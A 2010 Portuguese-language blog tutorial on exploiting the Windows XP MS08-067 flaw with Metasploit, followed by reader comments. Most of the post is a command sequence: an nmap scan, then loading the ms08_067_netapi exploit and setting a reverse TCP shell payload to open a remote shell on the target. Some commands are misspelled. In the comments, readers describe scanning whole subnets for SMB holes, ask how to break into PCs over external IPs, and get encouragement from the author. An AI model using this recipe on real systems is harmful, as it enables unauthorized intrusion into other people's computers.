Metasploit - Explorando falha MS08-067

Posted: 13 maio 2010 by Bhior in Marcadores: ,
5

Nessa video aula mostro como usar o metasploit para explorar falha de segurança no sistema operacional Windows XP profissional sp2, que permite execução remota.

Programas usados:

Metasploit framework 3
Nmap

Exploit usado:

Citação:
ms08_067_netapi
Payload(carga) usado:
Citação:
shell_reverse_tcp
Tudo encontrado no BackTrack 4.

Solução da falha: Clique aqui

Comandos:
Citação:
nmap -sS -O Ip_do_alvo
cd /pentest/exploits/framework3
./msfconsole
show exploits
use windown/smb/ms08_067_netapi
show options
set rhots IP_do_alvo
set rport Porta
set payload /windows/shell/reverse_tcp
set lhost Meu_IP
set id "0" (0 e para encontrar o windows automaticamente, caso não encontre, digitar "info" vai ter o id de vários windows)
exploit


Baixar: http://www.4shared.com/file/692nIMUK/Metasploit-ms08_067_netapi.htm

Assistir on-line: http://bhior.blip.tv/file/3534979

5 comentários:

  1. tela says:

    bhior blz?
    cara optive sucessos tanto com PAYLOADS
    windows/shell/reverse_tcp como windows/vncinject/reverse_tcp

    Minha duvida é , dou o comando no terminal ( nmap -sP 192.168.1.1-255 ) tenho respota dos endereço dos IPs blz...
    agora faço assim ( nmap -v --script=smb-check-vulns 192.168.1.1-255 )

    tenho resposta das vulnerabilidade da porta 445 , 135,139 entre outras ou seja os ip que esteja com essa brexa eu posso entrar sem problemas?

    mas tipo tento entrar so que raramente consigo entrar e so entrei em um pc, esqueci tambem tem o comando nmap -O IP , tenhos resposta de alguns de outros não , sempre tento entrar nos que tem XP SP2,

  1. tela says:

    outra duvida é so conseguimos fazer esse tipo de penetração com os ip da mesma rede ?

    com ip externo seria capaz de penetrar , tenho acesso a alguns modem , pensei em tentar liberar alguma porta , existe algum jeito de entrar em algum pc .....

  1. Bhior says:

    @Tela, Não, o metasploit pode ser usando na internet.

    Para que a auditoria seja concretizada, o micro alvo deve possuir vulnerabilidades... Não e porque essa estar aberta que você vai consegui uma penetração no sistema.

    As vulnerabilidades existem em todas as versões do Windows incluindo as mais recentes com Windows seven e windows vista.

    Procure mais sobre o nessus e o openvas.

    Abraços []'

  1. Anônimo says:

    Beleza valeu pela dica ,
    bhior você poderia nos mostrar como seria com ip externos sem ser da propria rede! usar o metasploit para internet

    valeu......

  1. Anônimo says:

    Olá Bhior, utilizei essa tecnica e me retornou o seguinte erro. Login Failed. Execution Expired.

    Alguma falha de login? Teria como eu setar o login a ser usado? Pois a maquina na qual tentei conectar eu tenho todas as senhas de acesso.

    Valeu!